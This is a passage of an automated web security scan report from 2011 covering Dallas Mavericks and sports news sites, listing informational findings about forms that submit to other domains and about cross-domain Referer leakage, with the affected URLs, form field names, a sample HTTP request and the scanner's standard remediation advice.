Issue detail

The page contains a form which POSTs data to the domain feedburner.google.com. The form contains the following fields:

Request

GET /2011/06/13/10-observations-dallas-mavs-finals/ HTTP/1.1
Host: sportdfw.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

17.2. http://thesouthern.com/sports/basketball/article_c9733ff4-3bb8-56f0-83a0-e42a06ed2d38.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://thesouthern.com
Path:	/sports/basketball/article_c9733ff4-3bb8-56f0-83a0-e42a06ed2d38.html

Issue detail

The page contains a form which POSTs data to the domain broadcaster.townnews-mail.com. The form contains the following fields:

multiadd
format
goto
cmd
slid_1
slid_2
email

Request

GET /sports/basketball/article_c9733ff4-3bb8-56f0-83a0-e42a06ed2d38.html HTTP/1.1
Host: thesouthern.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

17.3. http://www.mavsmoneyball.com/2011/6/12/2220848/nba-finals-2011-dallas-mavericks-win-their-first-ever-championship previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.mavsmoneyball.com
Path:	/2011/6/12/2220848/nba-finals-2011-dallas-mavericks-win-their-first-ever-championship

Issue detail

The page contains a form which POSTs data to the domain www.sbnation.com. The form contains the following fields:

from_network_bar
return_to
community_id
username
password
commit
remember_me

Request

Response

17.4. http://www.mavsmoneyball.com/2011/6/12/2220848/nba-finals-2011-dallas-mavericks-win-their-first-ever-championship previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.mavsmoneyball.com
Path:	/2011/6/12/2220848/nba-finals-2011-dallas-mavericks-win-their-first-ever-championship

Issue detail

The page contains a form which POSTs data to the domain www.sbnation.com. The form contains the following fields:

from_network_bar
return_to
openid_url
commit
remember_me_openid

Request

Response

17.5. http://www.mavsmoneyball.com/2011/6/3/2205973/a-message-from-the-rest-of-us previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.mavsmoneyball.com
Path:	/2011/6/3/2205973/a-message-from-the-rest-of-us

Issue detail

The page contains a form which POSTs data to the domain www.sbnation.com. The form contains the following fields:

from_network_bar
return_to
openid_url
commit
remember_me_openid

Request

Response

17.6. http://www.mavsmoneyball.com/2011/6/3/2205973/a-message-from-the-rest-of-us previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.mavsmoneyball.com
Path:	/2011/6/3/2205973/a-message-from-the-rest-of-us

Issue detail

The page contains a form which POSTs data to the domain www.sbnation.com. The form contains the following fields:

from_network_bar
return_to
community_id
username
password
commit
remember_me

Request

Response

17.7. http://www.mavsmoneyball.com/fanposts previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.mavsmoneyball.com
Path:	/fanposts

Issue detail

The page contains a form which POSTs data to the domain www.sbnation.com. The form contains the following fields:

from_network_bar
return_to
community_id
username
password
commit
remember_me

Request

Response

17.8. http://www.mavsmoneyball.com/fanposts previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.mavsmoneyball.com
Path:	/fanposts

Issue detail

The page contains a form which POSTs data to the domain www.sbnation.com. The form contains the following fields:

from_network_bar
return_to
openid_url
commit
remember_me_openid

Request

Response

17.9. http://www.mavsmoneyball.com/mavericks-tickets previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.mavsmoneyball.com
Path:	/mavericks-tickets

Issue detail

The page contains a form which POSTs data to the domain www.sbnation.com. The form contains the following fields:

from_network_bar
return_to
openid_url
commit
remember_me_openid

Request

Response

17.10. http://www.mavsmoneyball.com/mavericks-tickets previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.mavsmoneyball.com
Path:	/mavericks-tickets

Issue detail

The page contains a form which POSTs data to the domain www.sbnation.com. The form contains the following fields:

from_network_bar
return_to
community_id
username
password
commit
remember_me

Request

Response

17.11. http://www.nba.com/mavericks/index_main.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.nba.com
Path:	/mavericks/index_main.html

Issue detail

The page contains a form which POSTs data to the domain oss.ticketmaster.com. The form contains the following fields:

iAcctId
iPIN
team
l
STAGE
PROC

Request

Response

17.12. http://www.nba.com/mavericks/index_main.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.nba.com
Path:	/mavericks/index_main.html

Issue detail

The page contains a form which POSTs data to the domain oss.ticketmaster.com. The form contains the following fields:

team
l
STAGE
PROC
iAcctId
iPIN

Request

Response

18. Cross-domain Referer leakage previous next
There are 234 instances of this issue:

http://ad.amgdgt.com/ads/
http://ad.amgdgt.com/ads/
http://ad.amgdgt.com/ads/
http://ad.amgdgt.com/ads/
http://ad.amgdgt.com/ads/
http://ad.amgdgt.com/ads/
http://ad.amgdgt.com/ads/
http://ad.amgdgt.com/ads/
http://ad.amgdgt.com/ads/
http://ad.amgdgt.com/ads/
http://ad.amgdgt.com/ads/
http://ad.amgdgt.com/ads/
http://ad.amgdgt.com/ads/
http://ad.amgdgt.com/ads/
http://ad.amgdgt.com/ads/
http://ad.amgdgt.com/ads/
http://ad.amgdgt.com/ads/
http://ad.amgdgt.com/ads/
http://ad.doubleclick.net/adi/N1558.NetMining/B5527925
http://ad.doubleclick.net/adi/N2436.150781.B3_GOOGLENETWORK/B5578200.5
http://ad.doubleclick.net/adi/N2436.150781.B3_GOOGLENETWORK/B5578200.8
http://ad.doubleclick.net/adi/N2998.specificmedia.com/B5470646.7
http://ad.doubleclick.net/adi/N3093.2630.AKAMAITECHNOLOGIES/B4852598.3
http://ad.doubleclick.net/adi/N3093.2630.AKAMAITECHNOLOGIES/B4852598.3
http://ad.doubleclick.net/adi/N447.153730.YAHOO.COM/B5548365.27
http://ad.doubleclick.net/adi/N447.153730.YAHOO.COM/B5548365.27
http://ad.doubleclick.net/adi/N447.153730.YAHOO.COM/B5548365.27
http://ad.doubleclick.net/adi/N553.Glam/B5345813.2
http://ad.doubleclick.net/adi/N553.expedia.com/B5280302.8
http://ad.doubleclick.net/adi/N553.expedia.com/B5280302.8
http://ad.doubleclick.net/adi/N6090.218.9105273493621/B5528573.7
http://ad.doubleclick.net/adi/amzn.us.audienceextension/
http://ad.doubleclick.net/adi/x1.dt/dt2
http://ad.doubleclick.net/adi/x1.dt/dt2
http://ad.doubleclick.net/adi/x1.rtb/fingerhut/mass/rmkt
http://ad.doubleclick.net/adi/x1.rtb/fingerhut/mass/rmkt
http://ad.doubleclick.net/adi/x1.rtb/fingerhut/mass/rmkt
http://ad.doubleclick.net/adj/N2949.280881.BUZZMEDIA/B5492484.2
http://ad.doubleclick.net/adj/N2949.280881.BUZZMEDIA/B5492484.3
http://ad.doubleclick.net/adj/N6090.278943.EXPEDIAMEDIASOLUTIO/B5435952.11
http://ad.doubleclick.net/adj/cm.tim/entertainment/blogs/tuned_in
http://ad.doubleclick.net/adj/cm.tim/entertainment/blogs/tuned_in
http://ad.doubleclick.net/adj/cm.tim/entertainment/blogs/tuned_in
http://ad.doubleclick.net/adj/cm.tim/entertainment/blogs/tuned_in
http://ad.doubleclick.net/adj/fansided.fsv/ros
http://ad.doubleclick.net/adj/gm.kotaku/e3
http://ad.doubleclick.net/adj/gm.kotaku/pax
http://ad.doubleclick.net/adj/gm.kotaku/threeDS
http://ad.doubleclick.net/adj/imdb2.consumer.title/maindetails
http://ad.doubleclick.net/adj/imdb2.consumer.title/maindetails
http://ad.doubleclick.net/adj/mavericks.dart/homepage_bottom_left_728x90
http://ad.doubleclick.net/adj/mavericks.dart/homepage_bottom_right_200x90
http://ad.doubleclick.net/adj/mtv.mtvi/atf_j_s/blog/hcb/favicon
http://ad.doubleclick.net/adj/mtv.mtvi/atf_j_s/blog/mvb/_2011/_06/_12/game_of_thrones_spoiler
http://ad.doubleclick.net/adj/mtv.mtvi/btf_j_s/blog/hcb/favicon
http://ad.doubleclick.net/adj/mtv.mtvi/btf_j_s/blog/mvb/_2011/_06/_12/game_of_thrones_spoiler
http://ad.doubleclick.net/adj/mtv.mtvi/btf_j_s/blog/mvb/_2011/_06/_12/game_of_thrones_spoiler
http://ad.doubleclick.net/adj/mtv.mtvi/btf_j_s/blog/mvb/_2011/_06/_12/game_of_thrones_spoiler
http://ad.doubleclick.net/adj/team_sites.dart/global_nav
http://ad.doubleclick.net/adj/ugo.ugo.tv/tv-index
http://ad.doubleclick.net/adj/ugo.ugo.tv/tv-index
http://ad.turn.com/server/ads.js
http://ad.turn.com/server/ads.js
http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1354.0.iframe.200x33/0.051183416275307536
http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1354.0.iframe.200x33/0.6281025498174131
http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1354.0.iframe.200x33/0.8921072278171778
http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1354.0.iframe.200x33/1307963455**
http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1354.0.iframe.200x33/1307967073**
http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1354.0.iframe.200x33/1307970673**
http://ad.yieldmanager.com/iframe3
http://ad.yieldmanager.com/iframe3
http://ad.yieldmanager.com/iframe3
http://ad.yieldmanager.com/pixel
http://ad.yieldmanager.com/v0/admeld-match
http://adadvisor.net/adscores/g.js
http://admeld-match.dotomi.com/admeld/match
http://admeld.adnxs.com/usersync
http://admeld.lucidmedia.com/clicksense/admeld/match
http://admin.brightcove.com/js/BrightcoveExperiences.js
http://adopt.imiclk.com/emb/q
http://adopt.imiclk.com/emb/q
http://ads.bluelithium.com/st
http://ads.tw.adsonar.com/adserving/getAds.jsp
http://adserv.impactengine.com/www/7u/8t/1p/2b/objembed.html
http://adserv.impactengine.com/www/8i/8j/9q/km/objembed.html
http://adserv.impactengine.com/www/j8/4t/w4/uf/objembed.html/@@1305142019@@
http://adserv.impactengine.com/www/l3/df/ey/qw/objembed.html/@@1302711674@@
http://adserver.veruta.com/cookiematch.fcgi
http://api.twitter.com/1/FanSided/lists//statuses.json
http://apps.conduit-banners.com/Twackle-Twackle_Sports
http://as.jivox.com/player/iabplayer.php
http://as.jivox.com/player/iabplayer.php
http://as.jivox.com/player/jivox_ad_tags.php
http://as.jivox.com/player/jivox_ad_tags.php
http://bidnw.ru4.com/nf
http://bidnw.ru4.com/nf
http://bn.xp1.ru4.com/nf
http://bp.specificclick.net/
http://bpx.a9.com/ads/getad
http://bpx.a9.com/ads/render
http://cdn.extensions.buzznet.com/topscript.js.php
http://cim.meebo.com/cim
http://cm.g.doubleclick.net/pixel
http://cm.g.doubleclick.net/pixel
http://cm.g.doubleclick.net/pixel
http://cm.g.doubleclick.net/pixel
http://cm.npc-lee.overture.com/js_1_0/
http://cms.ad.yieldmanager.net/v1/cms
http://creativeby1.unicast.com/assets/A322/N26843/M13937/P1944/Q72996/script_850_40.js
http://dg.specificclick.net/
http://fls.doubleclick.net/activityi
http://fls.doubleclick.net/activityi
http://fls.doubleclick.net/activityi
http://googleads.g.doubleclick.net/pagead/ads
http://googleads.g.doubleclick.net/pagead/ads
http://googleads.g.doubleclick.net/pagead/ads
http://googleads.g.doubleclick.net/pagead/ads
http://googleads.g.doubleclick.net/pagead/ads
http://googleads.g.doubleclick.net/pagead/ads
http://googleads.g.doubleclick.net/pagead/ads
http://googleads.g.doubleclick.net/pagead/ads
http://googleads.g.doubleclick.net/pagead/ads
http://googleads.g.doubleclick.net/pagead/ads
http://googleads.g.doubleclick.net/pagead/ads
http://googleads.g.doubleclick.net/pagead/ads
http://googleads.g.doubleclick.net/pagead/ads
http://googleads.g.doubleclick.net/pagead/ads
http://googleads.g.doubleclick.net/pagead/ads
http://googleads.g.doubleclick.net/pagead/ads
http://googleads.g.doubleclick.net/pagead/ads
http://googleads.g.doubleclick.net/pagead/ads
http://googleads.g.doubleclick.net/pagead/ads
http://googleads.g.doubleclick.net/pagead/ads
http://googleads.g.doubleclick.net/pagead/ads
http://googleads.g.doubleclick.net/pagead/ads
http://googleads.g.doubleclick.net/pagead/ads
http://googleads.g.doubleclick.net/pagead/ads
http://googleads.g.doubleclick.net/pagead/ads
http://googleads.g.doubleclick.net/pagead/ads
http://googleads.g.doubleclick.net/pagead/ads
http://googleads.g.doubleclick.net/pagead/ads
http://googleads.g.doubleclick.net/pagead/ads
http://googleads.g.doubleclick.net/pagead/ads
http://googleads.g.doubleclick.net/pagead/ads
http://googleads.g.doubleclick.net/pagead/ads
http://googleads.g.doubleclick.net/pagead/ads
http://googleads.g.doubleclick.net/pagead/ads
http://googleads.g.doubleclick.net/pagead/ads
http://googleads.g.doubleclick.net/pagead/ads
http://googleads.g.doubleclick.net/pagead/ads
http://googleads.g.doubleclick.net/pagead/ads
http://googleads.g.doubleclick.net/pagead/ads
http://googleads.g.doubleclick.net/pagead/ads
http://googleads.g.doubleclick.net/pagead/ads
http://googleads.g.doubleclick.net/pagead/ads
http://googleads.g.doubleclick.net/pagead/ads
http://googleads.g.doubleclick.net/pagead/ads
http://googleads.g.doubleclick.net/pagead/ads
http://googleads.g.doubleclick.net/pagead/ads
http://googleads.g.doubleclick.net/pagead/ads
http://googleads.g.doubleclick.net/pagead/ads
http://googleads.g.doubleclick.net/pagead/ads
http://googleads.g.doubleclick.net/pagead/ads
http://googleads.g.doubleclick.net/pagead/ads
http://googleads.g.doubleclick.net/pagead/ads
http://googleads.g.doubleclick.net/pagead/ads
http://googleads.g.doubleclick.net/pagead/ads
http://ib.adnxs.com/ab
http://ib.adnxs.com/ab
http://ib.adnxs.com/ab
http://ib.adnxs.com/ptj
http://img.mediaplex.com/content/0/12309/129868/1361274_us_smb_q1w12_728x90_mcsft_firstserver_dtp1a.js
http://img.timeinc.net/time/rd/trunk/www/web/feds/j/articles.js
http://k.collective-media.net/cmadj/cm.mtv/ent_010111
http://kotaku.com/static/ad_iframe.php
http://kotaku.com/static/ad_iframe.php
http://l.yimg.com/j/assets/eJx9UtuOgyAU_CJvXFSyH2NOkba0yDGA27hfv4BNVpO6T-LMnGEYePhqXXRFyq6s08ogjMoVk7alaxglpPl67CUjTuek-lY2nNMSrVUyaLTnGrB6gv8lD_-ZpSXdzvAmeddTnkivwMn7AN5rH6pI6m05kLoWdU_qpqX93i0G9QFs8BFsWdRklxldRhjnffYNcPHHMXxqlZCu5ywh4IKWJkOiafLQS9sRX_sxL9GpcD8eaAILN-UO9uBw8crsscWE_e9sYFVu2A58jDZNaKvVz8WEY_5uWotBFX-bccJFHhi1lwb94lL4tunY1gFKDWa4LCHEihLTv9txMOsxG3SMf0j2IcAVpLrEyqKsqymjJzJ5V_KZy2k5ZeJEpZUoZm2L4CCpb9k0XtSJ3MDPuj31JCRCZOHVrLik2F2Mc7bT7hriC9vaeiGkurkgov0FgL4UpA,,.js
http://l.yimg.com/j/assets/eJx9kWFuhCAQhU-kooC46WEMi3RlVxjDQDfu6QvYJtq0_QV5883jMXPHZoum6WpRk3xbQE7aVxPYSn9oF2rfMtp17dv9CCpwTqtgwFXWuN8Z6YyV_yN3_L1Ka7qn-SpyMVCei6ilV_MoEQ2GJhXNfh07Qi5k6Ejb0-HoloJikC5gEnuWmOKygi8K43wovtf4eh3bgrzi2QYeRmdFDJxlZQarRwtTXHQmOaFDXzqNemh_7H0aN8HzqKACr8N8_reVTt7OnUp6iKiXoxaX00omg2oBjD6H61vByB7XWnDNhmuVIpZTzVo9yos9p-zyB2X0pVqNq4KXmb4lXJA0pIx7uZopf7UTrAztfdkg5jSCMloc10Vu2o_7ln6kHq8QAthv9RPVHctE.js
http://l.yimg.com/zz/combo
http://load.exelator.com/load/
https://login.yahoo.com/config/login_verify2
http://mediacdn.disqus.com/1307735099/build/system/disqus.js
http://my.yahoo.com/darla/fc.php
http://my.yahoo.com/darla/fc.php
http://my.yahoo.com/darla/fc.php
http://my.yahoo.com/darla/fc.php
http://my.yahoo.com/darla/fc.php
http://my.yahoo.com/darla/fc.php
http://my.yahoo.com/darla/fc.php
http://my.yahoo.com/darla/fc.php
http://n4403ad.doubleclick.net/adj/gn.sk.tvfanatic.com/ros
http://n4403ad.doubleclick.net/adj/gn.sk.tvfanatic.com/ros
http://oascentral.sportsfanlive.com/RealMedia/ads/adstream_jx.ads/fansided.sportsfanlive.com/default/jx/solo/1@x06
http://oascentral.sportsfanlive.com/RealMedia/ads/adstream_jx.ads/fansided.sportsfanlive.com/default/jx/thirdparty/1[INSERT-TIMESTAMP]@Left
http://oascentral.sportsfanlive.com/RealMedia/ads/adstream_jx.ads/fansided.sportsfanlive.com/default/jx/thirdparty/1[INSERT-TIMESTAMP]@Position2
http://open.ad.yieldmanager.net/a1
http://open.ad.yieldmanager.net/a1
http://pagead2.googlesyndication.com/pagead/ads
http://pagead2.googlesyndication.com/pagead/ads
http://pixel.invitemedia.com/admeld_sync
http://pixel.invitemedia.com/admeld_sync
http://platform0.twitter.com/widgets/follow_button.html
http://showadsak.pubmatic.com/AdServer/AdServerServlet
http://sports.yahoo.com/nba/expertsarchive
http://sports.yahoo.com/nba/news
http://sports.yahoo.com/nba/news
http://sports.yahoo.com/nba/news
http://thesouthern.com/content/tncms/live/global/resources/scripts/common.js
http://um.simpli.fi/am_js.js
http://www.expedia.com/New-York-Hotels-Millenium-Hilton.h892034.Hotel-Information
http://www.expedia.com/daily/promos/deals/summervacationsale/default.asp
http://www.expedia.com/daily/promos/deals/summervacationsale/destination_deals.asp
http://www.expedia.com/static/default/default/scripts/exp/core/ChannelTracking.js
http://www.facebook.com/plugins/activity.php
http://www.facebook.com/plugins/comments.php
http://www.facebook.com/plugins/like.php
http://www.facebook.com/plugins/likebox.php
http://www.facebook.com/plugins/likebox.php
http://www.facebook.com/plugins/likebox.php
http://www.facebook.com/plugins/likebox.php
http://www.facebook.com/plugins/likebox.php
http://www.facebook.com/plugins/likebox.php
http://www.facebook.com/plugins/recommendations.php
http://www.facebook.com/widgets/like.php
http://www.google.com/hostednews/ap/article/ALeqM5iGfrQs22UmRhzj0PiJzcmIjzcnKg
http://www.google.com/trends/hottrends
http://www.google.com/trends/hottrends
http://www.google.com/trends/hottrends
http://www.google.com/trends/hottrends
http://www.nba.com/video/cvp/teamarticleplayer.html
http://www.paperg.com/jsfb/embed.php
http://www.stumbleupon.com/badge/embed/5/
http://www.ugo.com/cm/ugo/js/ugo-global.js
http://www2.glam.com/app/site/affiliate/viewChannelModule.act

Issue background

When a web browser makes a request for a resource, it typically adds an HTTP header, called the "Referer" header, indicating the URL of the resource from which the request originated. This occurs in numerous situations, for example when a web page loads an image or script, or when a user clicks on a link or submits a form.

If the resource being requested resides on a different domain, then the Referer header is still generally included in the cross-domain request. If the originating URL contains any sensitive information within its query string, such as a session token, then this information will be transmitted to the other domain. If the other domain is not fully trusted by the application, then this may lead to a security compromise.

You should review the contents of the information being transmitted to other domains, and also determine whether those domains are fully trusted by the originating application.

Today's browsers may withhold the Referer header in some situations (for example, when loading a non-HTTPS resource from a page that was loaded over HTTPS, or when a Refresh directive is issued), but this behaviour should not be relied upon to protect the originating URL from disclosure.

Note also that if users can author content within the application then an attacker may be able to inject links referring to a domain they control in order to capture data from URLs used within the application.

Issue remediation

The application should never transmit any sensitive information within the URL query string. In addition to being leaked in the Referer header, such information may be logged in various locations and may be visible on-screen to untrusted parties.

18.1. http://ad.amgdgt.com/ads/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.amgdgt.com
Path:	/ads/

Issue detail

The page was loaded from a URL containing a query string:

http://ad.amgdgt.com/ads/?t=i&f=j&p=4703&pl=d9d74e00&rnd=92877432121895250&clkurl=http://ad.amgdgt.com/ads/t=c/s=AAAAAQAU2HP6amZ2cuQDn.1VRwprKeQZhhFnZW8sdXNhLHQsMTMwNzk2NzA5MDU3NCxjLDM0ODY2MyxwYyw3OTAxNCxhYywxNzM0NTIsbyxOMC1TMCxsLDYzNDY3LHBjbGljayxodHRwOi8vaWIuYWRueHMuY29tL2NsaWNrLzFxTndQUXJYNnpfWG8zQTlDdGZyUHdBQUFHQm1aZ3BBcEhBOUN0Y2pFMENrY0QwSzF5TVRRSWxDbW80aDVQUm5fYXlER292QmR5OXZfdlZOQUFBQUFJd3VBQUMxQUFBQWxnSUFBQUlBQUFEcmp3VUEwV01BQUFFQUFBQlZVMFFBVlZORUFOZ0NXZ0F6QzFnQXpnVUJBZ1VDQVFRQUFBQUFwU1BaZUFBQUFBQS4vY25kPSFHUVZsS2dpLXpRUVE2NThXR05ISEFTQUEvcmVmZXJyZXI9aHR0cDovL3d3dy50d2Fja2xlLmNvbS9oZWFkbGluZXMvY2xpY2tlbmM9aHR0cDovL2FkY2xpY2suZy5kb3VibGVjbGljay5uZXQvYWNsaz9zYT1sJmFpPUJTeW5jYl83MVRZYXVDYVg2bEFlRjE3bm5DZGZxLU5NQnI1NlU3QmpUeGUzVUhBQVFBUmdCSUFBNEFWQ0F4LUhFQkdESjF2S0d5S1A4R29JQkYyTmhMWEIxWWkwM05EazBNVFUyTURJM01ERTRNelF5b0FIRDh2M3NBN0lCRDNkM2R5NTBkMkZqYTJ4bExtTnZiYm9CQ1RjeU9IZzVNRjloYzhnQkNkb0JJR2gwZEhBNkx5OTNkM2N1ZEhkaFkydHNaUzVqYjIwdmFHVmhaR3hwYm1Wem1BTG1Cc0FDQk1nQ2hkTFBDcWdEQWVnRGlBTG9BN1VJOVFNQUFBREFnQWJVejZXSDFMV0UxNUVCJm51bT0xJnNpZz1BR2lXcXR3SkdiVlJPT1I5b2hVS05Xa1pVa3Y1aC0zM2tRJmNsaWVudD1jYS1wdWItNzQ5NDE1NjAyNzAxODM0MiZhZHVybD0K/clkurl=

The response contains the following links to other domains:

http://ad.doubleclick.net/adj/N3727.Expedia.com/B5235969.34;sz=728x90;click=http://ad.amgdgt.com/ads/t=c/s=AAAAAQAU9ghjlZF6iSwYlb.krXjG_wmefTlnZW8sdXNhLHQsMTMwNzk2NzA5MTgzNCxjLDM0ODU5MyxwYyw3ODUyNyxhYywxNzE4ODYsbyxOMC1TMCxsLDYzMDg2LHBjbGljayxodHRwOi8vYWQuYW1nZGd0LmNvbS9hZHMvdD1jL3M9QUFBQUFRQVUySFA2YW1aMmN1UURuLjFWUndwcktlUVpoaEZuWlc4c2RYTmhMSFFzTVRNd056azJOekE1TURVM05DeGpMRE0wT0RZMk15eHdZeXczT1RBeE5DeGhZeXd4TnpNME5USXNieXhPTUMxVE1DeHNMRFl6TkRZM0xIQmpiR2xqYXl4b2RIUndPaTh2YVdJdVlXUnVlSE11WTI5dEwyTnNhV05yTHpGeFRuZFFVWEpZTm5wZldHOHpRVGxEZEdaeVVIZEJRVUZIUW0xYVozQkJjRWhCT1VOMFkycEZNRU5yWTBRd1N6RjVUVlJSU1d4RGJXODBhRFZRVW01ZllYbEVSMjkyUW1SNU9YWmZkbFpPUVVGQlFVRkpkM1ZCUVVNeFFVRkJRV3huU1VGQlFVbEJRVUZFY21wM1ZVRXdWMDFCUVVGRlFVRkJRbFpWTUZGQlZsWk9SVUZPWjBOWFowRjZRekZuUVhwblZVSkJaMVZEUVZGUlFVRkJRVUZ3VTFCYVpVRkJRVUZCUVM0dlkyNWtQU0ZIVVZac1MyZHBMWHBSVVZFMk5UaFhSMDVJU0VGVFFVRXZjbVZtWlhKeVpYSTlhSFIwY0RvdkwzZDNkeTUwZDJGamEyeGxMbU52YlM5b1pXRmtiR2x1WlhNdlkyeHBZMnRsYm1NOWFIUjBjRG92TDJGa1kyeHBZMnN1Wnk1a2IzVmliR1ZqYkdsamF5NXVaWFF2WVdOc2F6OXpZVDFzSm1GcFBVSlRlVzVqWWw4M01WUlpZWFZEWVZnMmJFRmxSakUzYm01RFpHWnhMVTVOUW5JMU5sVTNRbXBVZUdVelZVaEJRVkZCVW1kQ1NVRkJORUZXUTBGNExVaEZRa2RFU2pGMlMwZDVTMUE0UjI5SlFrWXlUbWhNV0VJeFdXa3dNMDVFYXpCTlZGVXlUVVJKTTAxRVJUUk5lbEY1YjBGSVJEaDJNM05CTjBsQ1JETmtNMlI1TlRCa01rWnFZVEo0YkV4dFRuWmlZbTlDUTFSamVVOUlaelZOUmpsb1l6aG5Ra05rYjBKSlIyZ3daRWhCTmt4NU9UTmtNMk4xWkVoa2FGa3lkSE5hVXpWcVlqSXdkbUZIVm1oYVIzaHdZbTFXZW0xQlRHMUNjMEZEUWsxblEyaGtURkJEY1dkRVFXVm5SR2xCVEc5Qk4xVkpPVkZOUVVGQlJFRm5RV0pWZWpaWFNERk1WMFV4TlVWQ0ptNTFiVDB4Sm5OcFp6MUJSMmxYY1hSM1NrZGlWbEpQVDFJNWIyaFZTMDVYYTFwVmEzWTFhQzB6TTJ0UkptTnNhV1Z1ZEQxallTMXdkV0l0TnpRNU5ERTFOakF5TnpBeE9ETTBNaVpoWkhWeWJEMEsvY2xrdXJsPQo-/clkurl=;ord=1150304106?
http://b.scorecardresearch.com/p?c1=8&c2=6035179&c3=1&c4=78527&c5=171886&c6=&cv=1.3&cj=1&rn=988152830

Request

GET /ads/?t=i&f=j&p=4703&pl=d9d74e00&rnd=92877432121895250&clkurl=http://ad.amgdgt.com/ads/t=c/s=AAAAAQAU2HP6amZ2cuQDn.1VRwprKeQZhhFnZW8sdXNhLHQsMTMwNzk2NzA5MDU3NCxjLDM0ODY2MyxwYyw3OTAxNCxhYywxNzM0NTIsbyxOMC1TMCxsLDYzNDY3LHBjbGljayxodHRwOi8vaWIuYWRueHMuY29tL2NsaWNrLzFxTndQUXJYNnpfWG8zQTlDdGZyUHdBQUFHQm1aZ3BBcEhBOUN0Y2pFMENrY0QwSzF5TVRRSWxDbW80aDVQUm5fYXlER292QmR5OXZfdlZOQUFBQUFJd3VBQUMxQUFBQWxnSUFBQUlBQUFEcmp3VUEwV01BQUFFQUFBQlZVMFFBVlZORUFOZ0NXZ0F6QzFnQXpnVUJBZ1VDQVFRQUFBQUFwU1BaZUFBQUFBQS4vY25kPSFHUVZsS2dpLXpRUVE2NThXR05ISEFTQUEvcmVmZXJyZXI9aHR0cDovL3d3dy50d2Fja2xlLmNvbS9oZWFkbGluZXMvY2xpY2tlbmM9aHR0cDovL2FkY2xpY2suZy5kb3VibGVjbGljay5uZXQvYWNsaz9zYT1sJmFpPUJTeW5jYl83MVRZYXVDYVg2bEFlRjE3bm5DZGZxLU5NQnI1NlU3QmpUeGUzVUhBQVFBUmdCSUFBNEFWQ0F4LUhFQkdESjF2S0d5S1A4R29JQkYyTmhMWEIxWWkwM05EazBNVFUyTURJM01ERTRNelF5b0FIRDh2M3NBN0lCRDNkM2R5NTBkMkZqYTJ4bExtTnZiYm9CQ1RjeU9IZzVNRjloYzhnQkNkb0JJR2gwZEhBNkx5OTNkM2N1ZEhkaFkydHNaUzVqYjIwdmFHVmhaR3hwYm1Wem1BTG1Cc0FDQk1nQ2hkTFBDcWdEQWVnRGlBTG9BN1VJOVFNQUFBREFnQWJVejZXSDFMV0UxNUVCJm51bT0xJnNpZz1BR2lXcXR3SkdiVlJPT1I5b2hVS05Xa1pVa3Y1aC0zM2tRJmNsaWVudD1jYS1wdWItNzQ5NDE1NjAyNzAxODM0MiZhZHVybD0K/clkurl= HTTP/1.1
Host: ad.amgdgt.com
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-7494156027018342&output=html&h=90&slotname=0457253054&w=728&lmt=1307985085&flash=10.3.181&url=http%3A%2F%2Fwww.twackle.com%2Fheadlines&dt=1307967085704&bpp=3&shv=r20110608&jsv=r20110607&correlator=1307967085746&frm=4&adk=3937882929&ga_vid=614070449.1307962974&ga_sid=1307962974&ga_hid=642594083&ga_fc=1&u_tz=-300&u_his=15&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=32&u_nplug=9&u_nmime=45&biw=1049&bih=926&ref=http%3A%2F%2Fwww.twackle.com%2Fheadlines&fu=0&ifi=1&dtd=85&xpc=fI9ap0W4vx&p=http%3A//www.twackle.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
